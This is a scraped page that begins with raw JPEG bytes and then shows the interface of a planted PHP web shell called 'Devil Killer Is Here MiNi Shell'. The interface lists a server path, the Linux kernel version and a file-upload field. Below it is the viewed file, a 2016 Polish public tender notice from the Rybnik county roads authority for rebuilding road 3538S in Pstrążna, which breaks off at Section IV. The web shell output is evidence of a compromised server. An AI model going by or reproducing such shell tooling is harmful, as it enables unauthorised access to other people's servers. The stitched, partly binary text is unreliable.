JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160905/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160905/305236-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 305236 - 2016
              z dnia 2016-09-05 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Rybnik: Przebudowa  drogi powiatowej nr  3538S ul. Morcinka w Pstrążnej.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Dróg Powiatowych, krajowy numer identyfikacyjny
              27628565500000, ul.
              ul. Jankowicka 
              49,
              44200  
              Rybnik, woj.
              śląskie, państwo
              , tel.
              32 4227478, 4227874, e-mail
              ZDP@POWIATRYBNICKI.PL, faks
              324 227 479.
              <br />
              Adres strony internetowej (URL): www.bip.zdp.powiatrybnicki.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.zdp.powiatrybnicki.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br />ww.bip.zdp.powiatrybnicki.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnej<br />
                Adres:
                <br />Zarząd Dróg Powiatowych, 44-200 Rybnik,ul.Jankowicka 49 pok. 14</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przebudowa  drogi powiatowej nr  3538S ul. Morcinka w Pstrążnej.<br /><b>Numer referencyjny: </b>ZP-SD/22DP/16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest  przebudowa  drogi powiatowej 3538S na  odcinku ulicy Morcinka w Pstrążnej 
od km 0+410 załączonej dokumentacji projektowej do km 1+081 tj. do granicy z powiatem raciborskim , 
łącznej długości  0,671km,  polegająca   m.in. na :

a) odtworzeniu trasy i punktów wysokościowych , w tym:
-   roboty pomiarowe przy liniowych robotach ziemnych                                    -   0,671 km

b) zdjęciu warstwy humusu i darniny, w tym:
-   ręczne usunięcie warstwy ziemi urodzajnej o grub. 15 cm                             -  1215,0 m2

c) rozbiórce elementów dróg, w tym m.in.
-   mechaniczne cięcie szczelin w nawierzchni bitumicznej                                -    14,0 m
-   frezowanie nawierzchni asfaltowej na zimno głęb. 5 cm                                -   3045 m2
-   mechaniczne rozebranie podbudowy z kruszywa grub. 10 cm                      -   3045 m2 
-   rozebranie nawierzchni z mieszanek mineralno  bitumicznych gr. 5 cm     -       59 m2     
-   rozebranie nawierzchni z kostki brukowej                                                     -   71,8  m2
-   rozebranie nawierzchni z kostki kamiennej                                                    -    6,2  m2 
-   mechaniczne rozebranie podbudowy betonowej grub. 15 cm                        -     0,7 m2
-   demontaż studzienek ściekowych                                                                   -       1 szt. 
-   wywiezienie gruzu wraz kosztami  utylizacji                                                 -   314,64m3   
 
d) wykonaniu wykopów, w tym m.in. :
-   roboty ziemne z przewozem gruntu taczkami                                                  -   105,3 m3
-   roboty ziemne wykonywane koparkami przedsiębiernymi o poj. łyżki 0,15 m3
    z transportem urobku samochodami samowyładowczymi i kosztami utylizacji  1776 m3
-   plantowanie skarp i dna wykopów                                                                    -      317 m2

e) wykonaniu nasypów
-   ręczne formowanie nasypów, zagęszczenie nasypów                                      -   105,3 m3
-   plantowaniu nasypów                                                                                       -  719,4 m2

f)  wykonaniu kanalizacji deszczowej, w tym m.in.
-   wykopy liniowe pod kolektor                                                                           -     94 m3
-   wykopy liniowe pod przykanalik                                                                     -      9,1 m3
-   wykopy pod studzienki ściekowe i studnie rewizyjne                                      -   74,5 m3
-   ażurowe umocnienie ścian wykopów                                                               -  340,6 m2   
-   kanały z rur PCV śred. 200 mm                                                                       -      7,0 m
-   kanały z rur PCV 315mm                                                                                 -    50,0 m
-   studnie rewizyjne   z kręgów betonowych średnicy 1000 mm                         -    4 szt.
-   studnie chłonne  z kręgów 1,2m                                                                       -    2 szt. 
-   studzienki ściekowe betonowe śred. 500 mm                                                  -    7 szt.
-   obsypanie kanału z PCV piaskiem                                                                   -    46,2 m3
-   zasypywanie wykopów                                                                                    -  115,3 m3
-   odwóz ziemi z wykonania wykopów  , utylizacja gleby                                 -    62,9 m3

g) wykonaniu koryta wraz z profilowaniem, w tym
-   profilowanie i zagęszczanie podłoża pod w-wy konstrukcyjne nawierzchni    - 3928,4 m2

h)  wzmocnieniu podłoża , w tym:
-    warstwa przeciwspękaniowa pod warstwy bitumiczne                                     - 3928,4 m2

i)    wykonaniu podbudowy z kruszywa łamanego, w tym:
-   warstwa dolna podbudowy z kruszyw łamanych grub. 24 cm                           - 3748,4 m2           
-   warstwa górna podbudowy z kruszyw łamanych grub. 12 cm                           - 3748,4 m2

j)  oczyszczeniu i skropieniu warstw konstrukcyjnych                                           - 3748,4 m2  

k) wykonaniu nawierzchni z betonu asfaltowego, w tym:
-   oczyszczenie i skropienie nawierzchni bitumicznych                                        -  3612 m2
-   warstwa wiążąca z mieszanki min. asfaltowej grub. 5 cm                                 -  3612 m2
-   oczyszczenie i skropienie nawierzchni bitumicznych                                        -  3612 m2
-   warstwa ścieralna z mieszanki mineralno  asfaltowej grub. 5 cm                    -  3637,1 m2    

l)  umocnieniu powierzchni skarp
-   humusowanie skarp z obsianiem przy grub. w-wy humusu 5 cm                          - 1036,0 m2    

m) ręcznym profilowaniu i zagęszczaniu poboczy oraz utwardzeniu destruktem asfaltowym                                                         
                                                                                                                                    -  595 m2
n)  ułożeniu krawężników, w tym m.in.
-   ława betonowa z oporem  pod krawężnik                                                             -  40,25 m3
-   ułożenie krawężnika betonowego                                                                         -   676 m       

o) wykonaniu chodnika , w tym:
-   profilowanie i zagęszczanie podłoża wykonywane ręcznie                                  -   619 m2
-   wykonanie   warstwy podbudowy z tłucznia kamiennego grub. 10 cm                -   449 m2
-   nawierzchnia chodnika z kostki betonowej brukowej grub. 6 cm                        -    449 m2
-   wykonanie warstwy podbudowy z tłucznia kamiennego grub. 15 cm                  -  81,3 m2
-   nawierzchnia na zjazdach przez chodnik z kostki betonowej grub. 8 cm             -  81,3 m2

p) ułożeniu obrzeży betonowych o wym. 20x6 cm                                                   -     362 m 

r)   regulacja wjazdów i wyjazdów z bram
-    remont cząstkowy nawierzchni z kostki kamiennej                                            -     67,8 m2
-    remont cząstkowy nawierzchni bitumicznej                                                       -     8,7 Mg
-    remont cząstkowy nawierzchni z betonu                                                            -     0,48 m3  


Powyższe zapisy i ilości wyszczególniają ważniejsze pozycje występujące w projekcie, opisane w wersji skróconej, celem orientacji  co do  zakresu   robót. 
Opis ten nie powiela przedmiaru robót  w pełnym zakresie (nie zawiera 100% pozycji przedmiaru), ani nie uwzględnia  pełnego zakresu prac przewidzianego projektem.  
Szczegóły dotyczące opisu przedmiotu zamówienia , zakresu oraz technologii wykonania i odbioru robót zawierają: projekt budowlano- wykonawczy (stanowiący załącznik nr 1 do SIWZ) wraz  z Specyfikacjami Technicznymi Wykonania i Odbioru  Robót (stanowiący załącznik nr 2 do SIWZ)a także  przedmiar robót (stanowiący załącznik nr 3 do SIWZ) .  
Załączoną dokumentację projektową należy czytać w km 0+410  1+081.

<br /><br /><b>II.5) Główny kod CPV: </b>42233142-6<br /><b> Dodatkowe kody CPV:</b>45233253-7,
                45111200-0,
                45111100-9,
                45233300-2,
                45233100-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 10/12/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1).Wykonanie w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, minimum 1 roboty polegającej na wykonaniu remontu, przebudowy lub budowy   drogi       o nawierzchni bitumicznej wraz   z infrastrukturą drogową   o wartości co najmniej 800 000,00 złotych brutto     UWAGA: a).Wykazując spełnianie warunków udziału w postępowaniu w wykazie robót  złożonym wraz z ofertą należy podać  ich rodzaj, wartość, datę, miejsce  wykonania i podmioty, na rzecz których roboty te zostały wykonane                               w celu weryfikacji spełniania  warunków udziału w postępowaniu.
 b). W przypadku wykonawców wspólnie ubiegających się o  udzielenie   zamówienia lub korzystania z zasobów podmiotów trzecich na podstawie  art. 22a pzp minimum jeden wykonawca lub jeden podmiot udostępniający   zasoby musi posiadać pełne doświadczenie wskazane w warunku udziału  w  postępowaniu.
 c).  Wartości podane w dokumentach potwierdzających spełnianie warunku  w walutach innych niż wskazane przez Zamawiającego Wykonawca przeliczy wg średniego kursu NBP na dzień zawarcia umów o ich   wykonanie.
2).Dysponowanie minimum jedną osobą, która będzie pełniła funkcję kierownika robót posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej lub odpowiadające im ważne uprawnienia   budowlane,  
  które zostały wydane na podstawie wcześniej obowiązujących  przepisów, która  w okresie 3 lat przed upływem terminu składania ofert   pełniła funkcję kierownika budowy w odniesieniu do minimum 1 roboty  budowlanej, polegającej na wykonaniu  remontu, przebudowy lub budowy  drogi  o nawierzchni bitumicznej wraz  z infrastrukturą drogową   o wartości co najmniej 800 000,00 złotych brutto .
 UWAGA: 
 a).Wykazując spełnianie warunków udziału w postępowaniu w wykazie osób   złożonym wraz z ofertą należy podać informację o doświadczeniu   kierownika  budowy w kierowaniu robotami budowlanymi (należy zamieścić  dane minimum  o 1 robocie budowlanej polegającej na wykonaniu remontu,  przebudowy lub  budowy  drogi  o nawierzchni bitumicznej wraz  z infrastrukturą drogową   o wartości co najmniej 800 000,00 złotych brutto, którymi ta  osoba kierowała   w celu weryfikacji  spełniania warunków udziału  w postępowaniu)
     b) .Wykonawca w celu wykazania spełniania w/wym. Warunku może wskazać osobę  będącą obywatelem państwa członkowskiego, która nabyła kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznaczne    wykonywaniu  samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej  zgodnie 
z właściwymi przepisamiu, w szczególności   z ustawą z 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych   nabytych w krajach  członkowskich Unii Europejskiej (Dz.U. z 2008 r. poz. 394) oraz   ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tj. Dz.U. z 2014r. poz. 1946), którą przedstawi Zamawiającemu przed zawarciem umowy.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                dot. kierownika budowy</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1).Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że   wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż  3 miesiące przed upływem terminu składania ofert , lub innego dokumentu   potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem   podatkowym w sprawie spłat tych  należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał  przewidziane prawem zwolnienie, odroczenie  lub rozłożenie na raty zaległych  płatności lub wstrzymanie w całości wykonania   decyzji właściwego organu; 

2).Zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń  Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu  potwierdzającego, że wykonawca nie zalega
z opłacaniem składek na ubezpieczenia  społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem  terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu,  lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z  właściwym organem w sprawie spłat tych należności wraz 
z ewentualnymi odsetkami   lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 

3).Oświadczenie wykonawcy o niezaleganiu z opłacaniem  podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991r. o podatkach i opłatach  lokalnych. 

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1).Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat  przed upływem terminu  
    składania ofert, a jeżeli okres prowadzenia działalności jest   krótszy  w tym okresie, wraz z podaniem ich rodzaju, 
    wartości, daty, miejsca  wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem
      dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy 
      roboty zostały wykonane zgodnie z przepisami  prawa budowlanego  i prawidłowo ukończone, przy czym 
      dowodami, o których  mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz  którego 
      roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie 
      jest w stanie uzyskać tych dokumentów   inne dokumenty  wg wzoru stanowiącego załącznik nr 5 do SIWZ.

 2). Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego  odpowiedzialnych za 
      kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, 
      doświadczenia i wykształcenia  niezbędnych do wykonania zamówienia publicznego, a także zakresu 
      wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami  załącznik 
       nr 6 do SIWZ.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.   Oświadczenia i dokumenty wymagane w sekcji 5-7 specyfikacji istotnych warunków 
      zamówienia.

2.   Formularz ofertowy (wg załącznika nr 7do SIWZ)  w przypadku składania oferty przez  podmioty   występujące 
      wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich  wykonawców składających ofertę wspólną.

3.  Pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania  w postępowaniu i zawarcia umowy, 
     w przypadku wykonawców wspólnie ubiegających  się  o udzielenie zamówienia zgodnie z art. 23 ustawy Prawo 
     zamówień publicznych (dotyczy  również wspólników spółki cywilnej).

4 .  Pełnomocnictwo do występowania w imieniu wykonawcy, w przypadku, gdy  dokumenty  składające się na ofertę 
      podpisuje osoba, której umocowanie do  reprezentowania wykonawcy nie będzie wynikać z dokumentów 
      załączonych do oferty.

5.   W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia  dokumenty i oświadczenia 
      składające się na ofertę powinny być podpisane przez  pełnomocnika.

6.   Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji z otwarcia ofert (o której 
      mowa w art. 86 ust. 5 ustawy), samodzielnie (bez odrębnego wezwania ze strony zamawiającego) przekaże 
      zamawiającemu oświadczenie  o przynależności lub braku przynależności do tej samej grupy kapitałowej z innymi 
      wykonawcami składającymi oferty w danym postępowaniu ( o której mowa w art. 24 ust. 1 pkt 2 Pzp)  wg 
      załącznika nr 9 do SIWZ. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania
      z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
